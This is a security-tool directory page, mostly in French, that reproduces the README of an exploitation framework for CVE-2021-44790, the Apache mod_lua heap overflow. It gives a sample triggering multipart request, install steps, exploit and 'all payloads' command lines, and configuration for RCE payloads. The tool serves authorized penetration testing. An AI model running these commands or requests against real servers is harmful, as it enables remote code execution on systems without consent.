Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web Vulnerability ScannersExploit FrameworksExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1il y a 13 joursPas encore vérifié

À propos

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) - Advanced exploitation framework with fingerprinting, multi-stage scanning, plugin architecture, professional reporting, screenshot capture, SQLite database, and 95%+ confidence detection. Author: Sudeepa Wanigarathna.

Partager

🔥 CVE-2021-44790 - Exploitation du dépassement de tampon d'Apache mod_lua

Version Python License CVE Apache CVSS Author


📋 Aperçu

Exploitation du dépassement de tampon d'Apache mod_lua est une plateforme d'exploitation avancée de niveau entreprise pour CVE-2021-44790 - une vulnérabilité critique de dépassement de tampon dans le module mod_lua du serveur Apache HTTP Server 2.4.x. Ce framework offre des capacités complètes d'empreinte numérique, de découverte intelligente de scripts, d'analyse multi-étapes et de génération de rapports professionnels, avec une détection à plus de 95 % de confiance.

⚡ Fonctionnalités clés


🎯 Détails de la vulnérabilité

Description technique

La vulnérabilité se situe dans le module mod_lua lors du traitement des requêtes multipart/form-data. Un sous-dépassement d'entier dans la fonction lua_request_parsebody() peut conduire à un dépassement de tampon basé sur le tas (heap), permettant potentiellement l'exécution de code à distance.

root@kitploit:~
POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Captures d'écran

Interface principaleRésultats d'empreinte

🚀 Démarrage rapide

Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Utilisation de base

root@kitploit:~
# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Utilisation détaillée

Options de la ligne de commande

root@kitploit:~
python3 exploit.py [TARGET] [OPTIONS]

Exemples

1. Évaluation de base de la vulnérabilité

root@kitploit:~
python3 exploit.py https://example.com --verbose --report all

2. Analyse d'environnement d'entreprise

root@kitploit:~
python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Test d'intrusion complet

root@kitploit:~
python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Analyse par lot

root@kitploit:~
python3 exploit.py --batch targets.txt --config config.yaml

5. Requêtes de base de données

root@kitploit:~
# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Configuration

config.yaml

root@kitploit:~
# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------

# Scan Settings
threads: 20                    # Concurrent threads
timeout: 10                    # Request timeout in seconds
retries: 3                     # Number of retry attempts
rate_limit: 10                 # Requests per second
max_depth: 3                   # Directory traversal depth
follow_redirects: true         # Follow HTTP redirects
verify_ssl: false              # Verify SSL certificates

# Network Settings
proxy: null                    # Proxy URL
http2: true                    # Enable HTTP/2 support
user_agent: random             # User-Agent (random/specific)
save_packets: false            # Save raw network packets

# Analysis Settings
research_mode: true            # Enable research database
verbose: false                 # Verbose output
scan_only: false               # Scan without exploitation
exploit: false                 # Enable exploitation
all_payloads: false            # Use all payloads

# Payload Settings
payloads:
  detection: true
  memory: true
  rce: true
  dos: false

# Report Settings
report_json: true
report_html: true
report_markdown: true
report_pdf: false
screenshot: false
reports_dir: reports

# Database Settings
database_path: luastorm.db
database_retention: 365

# Directory Settings
logs_dir: logs
screenshots_dir: screenshots

📊 Rapports

Tableau de bord HTML

  • Graphiques et tableaux interactifs
  • Visualisation de l'empreinte de la cible
  • Résumé de la découverte des scripts
  • Chronologie d'exécution des charges utiles
  • Évaluation de la vulnérabilité
  • Score de risque

Rapport JSON

root@kitploit:~
{
  "scan_id": "a1b2c3d4",
  "target": {
    "url": "https://example.com",
    "hostname": "example.com",
    "port": 443
  },
  "vulnerable": true,
  "risk_level": "Critical",
  "scan_duration": 45.23,
  "timestamp": "2026-08-04T15:45:23"
}

Rapport Markdown

  • Documentation lisible par l'humain
  • Données formatées en tableaux
  • Partage et intégration faciles
  • Compatible avec le contrôle de version

🗄️ Schéma de la base de données

root@kitploit:~
-- Targets table
CREATE TABLE targets (
    id INTEGER PRIMARY KEY,
    scan_id TEXT UNIQUE,
    url TEXT,
    hostname TEXT,
    ip TEXT,
    port INTEGER,
    protocol TEXT,
    apache_version TEXT,
    lua_version TEXT,
    os TEXT,
    architecture TEXT,
    waf TEXT,
    cdn TEXT,
    vulnerable INTEGER,
    risk_level TEXT,
    scan_date TEXT,
    duration REAL
);

-- Scripts table
CREATE TABLE scripts (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    path TEXT,
    method TEXT,
    status_code INTEGER,
    content_type TEXT,
    response_time REAL,
    vulnerable INTEGER
);

-- Payloads table
CREATE TABLE payloads (
    id INTEGER PRIMARY KEY,
    scan_id TEXT,
    script_id INTEGER,
    payload_name TEXT,
    payload_type TEXT,
    success INTEGER,
    response_time REAL,
    indicators TEXT,
    error TEXT
);

🔧 Système de plugins

Création d'un plugin

root@kitploit:~
# plugins/my_plugin.py
class MyPlugin:
    plugin_name = "my_plugin"
    plugin_version = "1.0"
    plugin_author = "Your Name"
    
    def __init__(self, config):
        self.config = config
    
    def execute(self, target_info):
        """Execute plugin logic"""
        return {
            'status': 'success',
            'message': 'Plugin executed',
            'data': {'target': target_info.url}
        }

🛡️ Considérations de sécurité

  • Utilisation autorisée uniquement : cet outil est destiné aux tests de sécurité autorisés
  • Conformité légale : assurez-vous d'avoir l'autorisation avant de tester
  • Divulgation responsable : signalez les vulnérabilités de manière responsable
  • Protection des données : toutes les données sensibles sont stockées localement

⚠️ Avertissement

root@kitploit:~
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.

Unauthorized use against systems you do not own or have explicit permission to test
is illegal and unethical. The author assumes no responsibility for misuse, damage,
or legal consequences arising from the use of this tool.

By using this tool, you agree to:
1. Only test systems you own or have written permission to test
2. Comply with all applicable laws and regulations
3. Report findings responsibly
4. Not use this tool for malicious purposes

📈 Métriques de performance


🗺️ Feuille de route

Version 2.1 (Planifiée)

  • Prise en charge de CVE supplémentaires
  • Interface web
  • Conteneurisation Docker
  • Pipeline CI/CD
  • Davantage de variantes de charges utiles

Version 2.2 (Future)

  • Intégration de l'apprentissage automatique
  • Exploitation automatisée
  • Analyse basée sur le cloud
  • Fonctionnalités de collaboration d'équipe
  • Techniques d'évasion avancées

🤝 Contribution

Les contributions sont les bienvenues ! Veuillez suivre ces directives :

  1. Forker le dépôt
  2. Créer une branche de fonctionnalité
  3. Effectuer vos modifications
  4. Soumettre une pull request

Configuration de développement

root@kitploit:~
# Clone your fork
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
python -m pytest tests/

👨‍💻 Auteur

Sudeepa Wanigarathna

  • Chercheur en sécurité et hacker éthique
  • GitHub : @CerberusMrXi
  • Spécialité : recherche de vulnérabilités et développement d'exploits

📄 Licence

À des fins éducatives et de tests autorisés uniquement

Ce logiciel est fourni « tel quel », sans garantie d'aucune sorte, expresse ou implicite.


⭐ Mettez une étoile à ce dépôt pour soutenir le projet !

💡 Vous avez trouvé un bug ? Ouvrir une issue

📧 Contact : [email protected]


Conçu avec ❤️ pour la communauté de la sécurité

Télécharger l’outil
FonctionnalitéDescription
🔍 Empreinte numérique avancéeDétection de la version d'Apache, de mod_lua, du système d'exploitation, de l'architecture, du WAF, du CDN, du conteneur et du fournisseur cloud
🎯 Découverte intelligentePlus de 7 techniques de découverte, notamment robots.txt, sitemap, analyse HTML, extraction JavaScript
💥 Analyse multi-étapesConnexion → Empreinte → Découverte → Vérification → Exploitation → Rapport
🧩 Système de plugins extensibleDéveloppement facile de plugins pour de futures CVE
🌐 Moteur HTTP intelligentPool de connexions, nouvelles tentatives, prise en charge HTTP/2, limitation du débit
📊 Rapports completsJSON, HTML, Markdown, PDF avec tableaux de bord interactifs
🎨 Interface terminal éléganteBibliothèque Rich avec barres de progression, tableaux et sortie à code couleur
💾 Base de données de rechercheStockage SQLite avec historique complet des analyses et prise en charge des requêtes
📸 Capture d'écranCaptures d'écran automatiques des pages web pour la collecte de preuves
🚀 Haute performancePlus de 20 threads simultanés, plus de 100 pools de connexions
AttributValeur
CVE IDCVE-2021-44790
VulnérabilitéDépassement de tampon (sous-dépassement d'entier)
Logiciel affectéApache HTTP Server 2.4.0 à 2.4.51
Version corrigéeApache HTTP Server 2.4.52 et ultérieur
ComposantModule mod_lua
Vecteur d'attaqueRéseau (à distance)
Score CVSS9,8 (Critique)
Impact sur la confidentialitéÉlevé
Impact sur l'intégritéÉlevé
Impact sur la disponibilitéÉlevé
Maturité de l'exploitPreuve de concept disponible
Progression de l'analyseTableau de bord du rapport HTML
OptionDescriptionExemple
TARGETURL ciblehttp://target.com
--config FILEFichier de configuration--config config.yaml
--threads NNombre de threads--threads 30
--timeout NDélai d'expiration de la requête (secondes)--timeout 15
--proxy URLURL du proxy--proxy http://127.0.0.1:8080
--verboseSortie détaillée--verbose
--scan-onlyAnalyse sans exploitation--scan-only
--exploitActiver l'exploitation--exploit
--all-payloadsUtiliser toutes les charges utiles--all-payloads
--report FORMATFormat du rapport (json/html/markdown/all)--report all
--output DIRRépertoire de sortie--output /path/to/reports/
--researchActiver le mode recherche--research
--database FILEChemin de la base de données--database luastorm.db
--screenshotPrendre des captures d'écran--screenshot
--batch FILEFichier de lot contenant les cibles--batch targets.txt
--query SQLExécuter une requête de base de données--query "SELECT * FROM targets"
FonctionnalitéPerformance
Empreinte numérique< 2 secondes
Découverte de scripts5-10 secondes
Test des charges utiles1-5 secondes par charge utile
Génération de rapports< 1 seconde
Opérations de base de données< 100 ms
Threads simultanés20+
Pool de connexions100+